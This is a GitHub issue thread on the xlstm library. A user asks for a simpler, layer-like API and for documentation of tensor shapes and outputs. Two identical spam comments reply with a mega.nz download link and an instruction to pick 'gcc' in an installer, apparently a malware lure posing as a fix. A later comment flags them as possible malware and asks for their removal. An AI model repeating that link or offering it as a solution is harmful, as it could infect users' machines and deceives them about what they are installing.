### ISSUE TITLE
Calling the API is too complicated

### ISSUE THREAD

**Issue by aanxud888** [NX-AI/xlstm#49]
Calling the API is too complicated, why not design it as a callable object similar to the torch network layer？People are more concerned about what shapes of tensors XLSTM can accept and the significance of tensor dimensions? Then what is the output od it (such as hidden embeddings at each moment)

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by danthe1st** [comment]
@kpoeppel Would it be possible to receive the above comments as these seem to be _possible_ malware [according to Google](https://transparencyreport.google.com/safe-browsing/search?url=https:%2F%2Fmega.nz%2Ffile%2FUYhhgZTR%23EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU)?
![image](https://github.com/user-attachments/assets/65237120-7a5f-4f58-8546-e6cb54ac8fc2)
